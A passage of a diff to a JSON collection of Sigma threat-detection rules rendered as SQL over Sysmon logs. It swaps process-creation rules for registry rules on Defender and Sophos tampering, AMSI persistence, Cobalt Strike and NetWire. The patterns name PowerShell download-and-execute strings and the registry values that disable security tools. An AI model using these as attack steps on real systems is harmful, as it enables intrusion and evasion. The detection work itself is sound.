ESCAPE '\\' AND CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\plink.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_plink.yml" + "filename": "registry_add_persistence_amsi_providers.yml" }, { - "title": "Suspicious PowerShell Download and Execute Pattern", - "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", + "title": "Potential NetWire RAT Activity - Registry", + "id": "1d218616-71b0-4c40-855b-9dbe75510f7f", "status": "experimental", - "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects registry keys related to NetWire RAT", + "author": "Christopher Peacock", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Software installers that pull packages from remote systems and execute them" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%IEX ((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '% -c (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\software\\\\NetWire%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_susp_download_patterns.yml" + "filename": "registry_add_malware_netwire.yml" }, { - "title": "Potential CVE-2021-41379 Exploitation Attempt", - "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", - "status": "test", - "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", - "author": "Florian Roth (Nextron Systems)", + "title": "CobaltStrike Service Installations in Registry", + "id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", + "status": "test", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", + "author": "Wojciech Lesicki", "tags": [ + "attack.execution", "attack.privilege_escalation", - "attack.t1068" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentImage LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%HKLM\\\\System\\\\CurrentControlSet\\\\Services%' ESCAPE '\\') AND ((Details LIKE '%ADMIN$%' ESCAPE '\\' AND Details LIKE '%.exe%' ESCAPE '\\') OR (Details LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND Details LIKE '%start%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2021_41379.yml" + "filename": "registry_set_cobaltstrike_service_installs.yml" }, { - "title": "Wscript Shell Run In CommandLine", - "id": "2c28c248-7f50-417a-9186-a85b223010ee", + "title": "Tamper With Sophos AV Registry Keys", + "id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", "status": "experimental", - "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", + "description": "Detects tamper attempts to sophos av functionality via registry key modification", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Rare legitimate inline scripting by some administrators" + "Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SAVEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SEDEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos\\\\SAVService\\\\TamperProtection\\\\Enabled%' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_script_wscript_shell_cli.yml" + "filename": "registry_set_sophos_av_tamper.yml" }, { - "title": "PrintBrm ZIP Creation of Extraction", - "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", + "title": "Potential Persistence Via AutodialDLL", + "id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", "status": "experimental", - "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", - "author": "frack113", + "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105", - "attack.defense_evasion", - "attack.t1564.004" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\WinSock2\\\\Parameters\\\\AutodialDLL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_printbrm.yml" + "filename": "registry_set_persistence_autodial_dll.yml" }, { - "title": "HackTool - Potential Impacket Lateral Movement Activity", - "id": "10c14723-61c7-4c75-92ca-9af245723ad2", - "status": "stable", - "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", - "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", + "title": "Disable Windows Defender Functionalities Via Registry Keys", + "id": "0eb46774-f1ab-4a74-8238-1155855f2263", + "status": "experimental", + "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", + "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator actions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\') AND (((TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableOnAccessProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Reporting\\\\DisableEnhancedNotifications' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\DisableBlockAtFirstSeen' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiSpyware' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiVirus' ESCAPE '\\') AND Details = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\SpyNet\\\\SpynetReporting' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\SubmitSamplesConsent' ESCAPE '\\' OR TargetObject LIKE '%\\\\MpEngine\\\\MpEnablePus' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" ], - "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" + "filename": "registry_set_windows_defender_tamper.yml" }, { - "title": "Suspicious WMIC Execution Via Office Process", - "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", + "title": "Potential Attachment Manager Settings Associations Tamper", + "id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", "status": "experimental", - "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", - "author": "Vadim Khrykov, Cyb3rEng", + "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", - "attack.execution", "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Associations\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\DefaultFileTypeRisk' ESCAPE '\\' AND Details = 'DWORD (0x00006152)') OR (TargetObject LIKE '%\\\\LowRiskFileTypes' ESCAPE '\\' AND (Details LIKE '%.zip;%' ESCAPE '\\' OR Details LIKE '%.rar;%' ESCAPE '\\' OR Details LIKE '%.exe;%' ESCAPE '\\' OR Details LIKE '%.bat;%' ESCAPE '\\' OR Details LIKE '%.com;%' ESCAPE '\\' OR Details LIKE '%.cmd;%' ESCAPE '\\' OR Details LIKE '%.reg;%' ESCAPE '\\' OR Details LIKE '%.msi;%' ESCAPE '\\' OR Details LIKE '%.htm;%' ESCAPE '\\' OR Details LIKE '%.html;%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml" + "filename": "registry_set_policies_associations_tamper.yml" }, { - "title": "File Download Using Notepad++ GUP Utility", - "id": "44143844-0631-49ab-97a0-96387d6b2d7c", + "title": "Custom File Open Handler Executes PowerShell", + "id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", "status": "experimental", - "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the abuse of custom file open handler, executing powershell", + "author": "CD_R0M_", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Other parent processes other than notepad++ using GUP that are not currently identified" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\GUP.exe' ESCAPE '\\' OR OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%shell\\\\open\\\\command\\\\%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\' AND Details LIKE '%-command%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "proc_creation_win_gup_download.yml" + "filename": "registry_set_custom_file_open_handler_powershell_execution.yml" }, { - "title": "Wab Execution From Non Default Location", - "id": "395907ee-96e5-4666-af2e-2ca91688e151", + "title": "Registry Persitence via Service in Safe Mode", + "id": "1547e27c-3974-43e2-a7d7-7f484fb928ec", "status": "experimental", - "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.execution" + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\' AND Details = 'Service') AND NOT ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\SAVService\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\SAVService\\\\(Default)' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_wab_execution_from_non_default_location.yml" + "filename": "registry_set_add_load_service_in_safe_mode.yml" }, { - "title": "Mavinject Inject DLL Into Running Process", - "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "title": "Disable Macro Runtime Scan Scope", + "id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", + "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", "status": "experimental", - "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", - "author": "frack113, Florian Roth", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Common\\\\Security%' ESCAPE '\\' AND TargetObject LIKE '%\\\\MacroRuntimeScanScope' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" + "filename": "registry_set_disable_macroruntimescanscope.yml" }, { - "title": "Suspicious Microsoft OneNote Child Process", - "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", + "title": "Windows Defender Service Disabled", + "id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", "status": "experimental", - "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", - "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", + "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", + "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", "tags": [ - "attack.t1566", - "attack.t1566.001", - "attack.initial_access" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "File located in the AppData folder with trusted signature" + "Administrator actions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\\Start' ESCAPE '\\' AND Details = 'DWORD (0x00000004)')" ], - "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" + "filename": "registry_set_disable_windows_defender_service.yml" }, { - "title": "Net WebClient Casing Anomalies", - "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", - "status": "experimental", - "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques", + "title": "Suspicious Printer Driver Empty Manufacturer", + "id": "e0813366-0407-449a-9869-a2db1119dc41", + "status": "test", + "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" ], "falsepositives": [ - "Unknown" + "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE 